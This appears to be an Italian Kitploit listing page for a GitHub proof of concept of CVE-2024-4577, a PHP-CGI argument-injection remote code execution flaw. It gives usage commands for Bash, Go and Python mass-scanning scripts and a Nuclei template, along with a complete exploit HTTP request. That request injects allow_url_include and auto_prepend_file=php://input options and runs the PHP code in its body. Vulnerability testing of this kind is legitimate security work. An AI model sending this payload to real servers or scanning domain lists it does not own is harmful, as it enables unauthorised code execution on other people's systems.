Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PoC RCE PHP per CVE-2024-4577 scritto in bash, go, python e un template nuclei

Vedi Repository
331321 mese faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PHP RCE PoC

CVE-2024-4577: Iniezione di argomenti in PHP-CGI

Panoramica

Questo repository contiene script per verificare la vulnerabilità CVE-2024-4577, un problema di iniezione di argomenti in PHP-CGI. Puoi utilizzare gli script Bash, Go e Python forniti per testare un elenco di domini per questa vulnerabilità. Ho anche rilasciato un file YAML per Nuclei.

Utilizzo

Script Bash

Per utilizzare lo script Bash, esegui il seguente comando:

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

Script Go

Per prima cosa, salva lo script Go in un file denominato CVE-2024-4577.go. Per compilare ed eseguire lo script Go:

  1. Compila lo script Go in un binario:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • Esegui il binario passando come argomento il file dell'elenco di domini:

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    
  • Script Python

    Per prima cosa, salva lo script Python in un file denominato CVE-2024-4577.py. Per eseguire lo script Python:

    1. Assicurati di avere installata la libreria requests:

      root@kitploit:~
      pip install requests
      
    2. Esegui lo script Python passando come argomento il file dell'elenco di domini:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list
      
    3. (Opzionale) Se vuoi stampare solo gli host vulnerabili:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list --quiet
      

    Proof of Concept (POC) spiegato

    Per testare manualmente la vulnerabilità, puoi inviare la seguente richiesta POST:

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    Template Nuclei

    Ho anche creato un template Nuclei per scansionare le istanze vulnerabili; utilizza lo schema di layout v3 ed è stato testato in un ambiente di laboratorio:

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <target-url>
    

    Esempio di elenco di domini

    L'elenco dei domini deve essere preceduto da http/https per essere letto correttamente.

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    Esempio di output

    Se un dominio risulta vulnerabile, l'output sarà:

    root@kitploit:~
    http://example.com: Vulnerable
    http://vulnerablesite.com: Vulnerable
    
    Scarica lo strumento